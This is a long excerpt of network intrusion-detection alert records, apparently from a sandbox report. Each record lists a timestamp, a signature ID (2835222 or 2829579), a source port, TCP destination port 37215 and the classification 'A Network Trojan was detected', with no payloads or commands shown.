          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557240
          SID:2835222
          Source Port:51458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065300
          SID:2835222
          Source Port:49372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941636
          SID:2829579
          Source Port:60468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151441
          SID:2829579
          Source Port:50922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.471114
          SID:2829579
          Source Port:49742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152156
          SID:2829579
          Source Port:37494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710175
          SID:2835222
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597066
          SID:2835222
          Source Port:50018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.473389
          SID:2829579
          Source Port:33978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992882
          SID:2829579
          Source Port:52178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.719062
          SID:2829579
          Source Port:59662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855618
          SID:2829579
          Source Port:35278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299424
          SID:2829579
          Source Port:53502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125690
          SID:2835222
          Source Port:57624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923731
          SID:2829579
          Source Port:46360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528165
          SID:2829579
          Source Port:33954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964371
          SID:2829579
          Source Port:50946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124650
          SID:2829579
          Source Port:56254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160398
          SID:2835222
          Source Port:55460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208067
          SID:2835222
          Source Port:43464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.624169
          SID:2829579
          Source Port:35154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.711024
          SID:2829579
          Source Port:36648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466313
          SID:2835222
          Source Port:48852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885281
          SID:2835222
          Source Port:43952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.636349
          SID:2829579
          Source Port:50932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.633376
          SID:2835222
          Source Port:44316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.207085
          SID:2835222
          Source Port:45380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399565
          SID:2829579
          Source Port:60922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227086
          SID:2829579
          Source Port:42824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223555
          SID:2829579
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878844
          SID:2835222
          Source Port:42798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424458
          SID:2829579
          Source Port:50546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591317
          SID:2829579
          Source Port:47728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.153945
          SID:2835222
          Source Port:49158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.333459
          SID:2829579
          Source Port:60312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664980
          SID:2835222
          Source Port:50032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922842
          SID:2835222
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991744
          SID:2835222
          Source Port:44882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597524
          SID:2835222
          Source Port:32812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944917
          SID:2829579
          Source Port:44996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143711
          SID:2829579
          Source Port:34518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907903
          SID:2829579
          Source Port:50372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299682
          SID:2829579
          Source Port:56936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285199
          SID:2829579
          Source Port:36024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877727
          SID:2829579
          Source Port:44332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938696
          SID:2835222
          Source Port:53264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892903
          SID:2829579
          Source Port:33272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320990
          SID:2835222
          Source Port:41644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.870625
          SID:2829579
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170252
          SID:2835222
          Source Port:59144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921131
          SID:2835222
          Source Port:44890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299991
          SID:2835222
          Source Port:44966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267067
          SID:2829579
          Source Port:46744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482608
          SID:2835222
          Source Port:36906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202032
          SID:2835222
          Source Port:50726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338723
          SID:2835222
          Source Port:48290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291630
          SID:2835222
          Source Port:40424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336479
          SID:2835222
          Source Port:52064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242662
          SID:2829579
          Source Port:41972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.242019
          SID:2835222
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.607930
          SID:2835222
          Source Port:57386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599084
          SID:2829579
          Source Port:44644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893997
          SID:2835222
          Source Port:56010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475546
          SID:2835222
          Source Port:40882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680141
          SID:2829579
          Source Port:33120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.911271
          SID:2829579
          Source Port:39174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227937
          SID:2829579
          Source Port:55356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336933
          SID:2835222
          Source Port:36028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145756
          SID:2835222
          Source Port:40946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475380
          SID:2829579
          Source Port:55254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838686
          SID:2829579
          Source Port:40010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.599051
          SID:2835222
          Source Port:53888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112820
          SID:2835222
          Source Port:55804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295290
          SID:2835222
          Source Port:48252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.119153
          SID:2835222
          Source Port:49392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652928
          SID:2835222
          Source Port:42384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474301
          SID:2829579
          Source Port:34418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328047
          SID:2835222
          Source Port:52142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.984950
          SID:2835222
          Source Port:58884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879151
          SID:2835222
          Source Port:55970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151313
          SID:2829579
          Source Port:38258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597366
          SID:2835222
          Source Port:55694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324600
          SID:2829579
          Source Port:55544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989100
          SID:2829579
          Source Port:58382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402461
          SID:2829579
          Source Port:48502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866025
          SID:2835222
          Source Port:45910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879301
          SID:2829579
          Source Port:37730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178414
          SID:2835222
          Source Port:58782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529216
          SID:2835222
          Source Port:52682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893821
          SID:2835222
          Source Port:54162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549216
          SID:2835222
          Source Port:59910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588934
          SID:2835222
          Source Port:54702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.051214
          SID:2829579
          Source Port:34416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560592
          SID:2835222
          Source Port:55812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283645
          SID:2829579
          Source Port:47268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891027
          SID:2829579
          Source Port:35022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959080
          SID:2835222
          Source Port:46546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117065
          SID:2835222
          Source Port:33634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216774
          SID:2829579
          Source Port:52332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297476
          SID:2829579
          Source Port:52382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138064
          SID:2835222
          Source Port:58168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.622189
          SID:2835222
          Source Port:50052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992374
          SID:2829579
          Source Port:43960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979639
          SID:2829579
          Source Port:53138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399493
          SID:2829579
          Source Port:51804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163833
          SID:2829579
          Source Port:42980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203067
          SID:2829579
          Source Port:58624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671919
          SID:2835222
          Source Port:44242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095510
          SID:2835222
          Source Port:59482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272339
          SID:2835222
          Source Port:51564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.590957
          SID:2829579
          Source Port:35368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211856
          SID:2835222
          Source Port:60168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266595
          SID:2829579
          Source Port:38786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708409
          SID:2835222
          Source Port:56026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183460
          SID:2829579
          Source Port:49896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959935
          SID:2829579
          Source Port:57392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.561988
          SID:2829579
          Source Port:48856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267967
          SID:2835222
          Source Port:34558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.981512
          SID:2835222
          Source Port:49050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090662
          SID:2835222
          Source Port:51706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022397
          SID:2835222
          Source Port:51528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471079
          SID:2829579
          Source Port:39322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229880
          SID:2835222
          Source Port:58752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726965
          SID:2829579
          Source Port:33250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271650
          SID:2835222
          Source Port:48118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.987263
          SID:2835222
          Source Port:49892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338491
          SID:2829579
          Source Port:41868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795943
          SID:2835222
          Source Port:37438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593199
          SID:2829579
          Source Port:46286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124694
          SID:2835222
          Source Port:56646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.681354
          SID:2835222
          Source Port:33248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841598
          SID:2835222
          Source Port:42734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907982
          SID:2835222
          Source Port:54166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325305
          SID:2835222
          Source Port:49048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650598
          SID:2829579
          Source Port:35604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.752065
          SID:2829579
          Source Port:36206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338678
          SID:2829579
          Source Port:37294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893513
          SID:2829579
          Source Port:36628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212657
          SID:2835222
          Source Port:35954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330166
          SID:2835222
          Source Port:40242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.063131
          SID:2829579
          Source Port:35696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.276247
          SID:2829579
          Source Port:51530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622834
          SID:2829579
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527735
          SID:2835222
          Source Port:42824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.213414
          SID:2829579
          Source Port:58342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020495
          SID:2835222
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206985
          SID:2835222
          Source Port:58170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.243938
          SID:2829579
          Source Port:59614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151522
          SID:2835222
          Source Port:33844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425996
          SID:2835222
          Source Port:42496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291803
          SID:2835222
          Source Port:51682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764194
          SID:2829579
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796186
          SID:2829579
          Source Port:34228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196289
          SID:2829579
          Source Port:48926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760445
          SID:2829579
          Source Port:57804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529985
          SID:2829579
          Source Port:33168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327824
          SID:2835222
          Source Port:35658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666586
          SID:2829579
          Source Port:57822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849110
          SID:2835222
          Source Port:56944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216356
          SID:2835222
          Source Port:53956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588649
          SID:2835222
          Source Port:48018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797366
          SID:2835222
          Source Port:32804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.554281
          SID:2835222
          Source Port:45786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272652
          SID:2829579
          Source Port:57280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178030
          SID:2835222
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196252
          SID:2829579
          Source Port:34948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008795
          SID:2835222
          Source Port:57308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.544803
          SID:2829579
          Source Port:42238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212724
          SID:2829579
          Source Port:42308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878673
          SID:2835222
          Source Port:38938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667652
          SID:2835222
          Source Port:36398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.288386
          SID:2829579
          Source Port:56668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595024
          SID:2835222
          Source Port:59068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711051
          SID:2829579
          Source Port:55274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287657
          SID:2829579
          Source Port:39208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064037
          SID:2835222
          Source Port:52510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267384
          SID:2829579
          Source Port:45820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680285
          SID:2835222
          Source Port:59010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767359
          SID:2829579
          Source Port:51874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.816742
          SID:2829579
          Source Port:50398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560891
          SID:2835222
          Source Port:37170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807874
          SID:2835222
          Source Port:34466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065054
          SID:2829579
          Source Port:50156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102355
          SID:2835222
          Source Port:35122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465333
          SID:2829579
          Source Port:59480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726605
          SID:2835222
          Source Port:56734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223835
          SID:2835222
          Source Port:54538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867528
          SID:2835222
          Source Port:41884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196048
          SID:2835222
          Source Port:56956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953909
          SID:2835222
          Source Port:40724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.145409
          SID:2829579
          Source Port:36536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553961
          SID:2835222
          Source Port:45968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543113
          SID:2835222
          Source Port:39734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812825
          SID:2835222
          Source Port:56418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269752
          SID:2829579
          Source Port:45534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923190
          SID:2835222
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.131732
          SID:2829579
          Source Port:40228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
